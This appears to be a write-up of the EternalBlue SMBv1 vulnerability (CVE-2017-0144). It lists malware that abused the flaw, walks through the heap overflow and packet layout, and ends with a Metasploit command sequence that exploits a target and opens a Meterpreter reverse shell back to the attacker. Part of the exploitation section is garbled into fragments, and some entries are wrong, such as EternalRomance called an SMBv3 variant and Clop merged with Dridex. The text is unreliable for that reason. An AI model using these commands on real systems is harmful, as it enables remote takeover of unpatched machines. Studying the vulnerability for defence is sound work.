
CVE-2017-0144

"One exploit. Dozens of malware families. Billions in damage."
CVE-2017-0144 is a critical remote code-execution vulnerability in the SMBv1 server implementation in Microsoft Windows. The exploit known as EternalBlue abused this hole and was used in high-impact attacks (notably WannaCry).
| # | Malware | Type | First Seen | Actor | Damage | Notes |
|---|---|---|---|---|---|---|
| 1 | WannaCry | Ransomware | May 12, 2017 | Lazarus Group (DPRK) | $4–8B | Killswitch: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com |
| 2 | NotPetya | Wiper (Posed as Ransomware) | Jun 27, 2017 | Sandworm (Russia) | $10B+ | Used Mimikatz + EternalBlue + PSEXEC |
| 3 | Bad Rabbit | Ransomware | Oct 24, 2017 | Indrik Spider | Regional | Fake Flash update drive-by |
| 4 | Uiwix | Ransomware | May 2017 | Unknown | Low | No killswitch, stealthier than WannaCry |
| 5 | EternalRocks | Worm | May 2017 | Unknown | Medium | 7 NSA tools (incl. DoublePulsar) |
| 6 | Adylkuzz | Cryptominer | May 2017 | Unknown | High (silent) | Mined Monero before WannaCry |
| 7 | Retefe | Banking Trojan | 2017–2018 | Unknown | EU Banks | Used EternalBlue for lateral movement |
| 8 | TrickBot | Modular Malware | 2017–2021 | Wizard Spider | Global | Dropped Ryuk via EternalBlue |
| 9 | Emotet | Loader | 2017–2021 | TA542 | Global | Used as entry for Cobalt Strike |
| 10 | Clop / Dridex | Ransomware | 2019–2025 | TA505 | Healthcare, Gov | Still active in 2025 |
| Tool | Release | Features |
|---|---|---|
| EternalBlue (Original) | Apr 2017 (Shadow Brokers) | SMBv1 RCE |
| DoublePulsar | Apr 2017 | Backdoor implant (ring0) |
| EternalRomance | Apr 2017 | SMBv3 variant |
| EternalChampion | Apr 2017 | Alternative SMB path |
| Metasploit Module | May 2017 | exploit/windows/smb/ms17_010_eternalblue |
| FuzzBunch | Apr 2017 | NSA exploit framework |
| Impacket + PSEXEC | 2017–2025 | Python SMB exploitation |
"One malformed packet. Full SYSTEM access. No login. No click."
[Attacker]
│
├──▶ Sends crafted SMBv1 **Trans2** request
│ → Triggers **heap overflow** in `srv!SrvOS2FeaListSizeToNt`
│
├──▶ Overwrites function pointers → **kernel shellcode**
│
└──▶ Executes **DoublePulsar** backdoor → **Ring-0 payload**
(e.g., WannaCry `mssecsvc.exe`)
| Requirement | Details |
|---|---|
| Target | Windows with SMBv1 enabled (default pre-Win10) |
| Port Open | 445/TCP (or 139/TCP via NetBIOS) |
| No Auth | Unauthenticated — no username/password needed |
| Architecture | x86 or x64 (both supported) |
| Patch Status | Unpatched (pre-MS17-010) |
SMB_COM_NEGOTIATE → Client sends dialect list
Server responds: SMBv1 supported → Proceed
Why? Confirms SMBv1 is active.
\\TARGET\IPC$ → Anonymous share for SMB pipes
Purpose: Establishes a session to send transaction requests.
SESSION_SETUPFEALIST {
SizeOfListInBytes = 0xFFFF (or large value)
...
}
Bug Trigger:
SrvOS2FeaListSizeToNt()trusts this size without bounds check.
FEA {
AttributeNameLength = 0x00
AttributeName = "A" * 0x1000 → Overflow buffer
}
Heap Spray: Allocates large chunks to control memory layout.
srv!SrvOS2FeaListSizeToNt(
PFEALIST FeaList, // attacker-controlled
PULONG pNtFeaListSize // output pointer
)
{
// No validation of FeaList->SizeOfListInBytes
memcpy(dest, src, FeaList->SizeOfListInBytes); // BOOM
}
Free routine)KeUserModeCallback)mssecsvc.exe)
0x00120034 XOR key)Ping: 0x0002C001Exec: 0x0002C002 + payloadWannaCry Example:
EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → Encrypts files
SMB Header
└── Command: 0x32 (TRANSACTION2)
└── Setup: 0x000E (SESSION_SETUP)
└── Parameter: TotalDataCount = 0x1000
└── Data:
[FEALIST]
SizeOfListInBytes = 0x1100
[FEA #1] NameLen=0, Name="A"*0x1000
[FEA #2] ...
[GROOM x100] → Spray heap
[OVERFLOW] → Overwrite pool
[SHELLCODE] → x64 ring0
| Tool | Language | Module |
|---|---|---|
| Metasploit | Ruby | exploit/windows/smb/ms17_010_eternalblue |
| Impacket | Python | smbclient.py, psexec.py |
| FuzzBunch | Python (NSA) | EternalBlue-2.2.0 |
| Custom C2 | C/C++ | WannaCry, NotPetya |
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit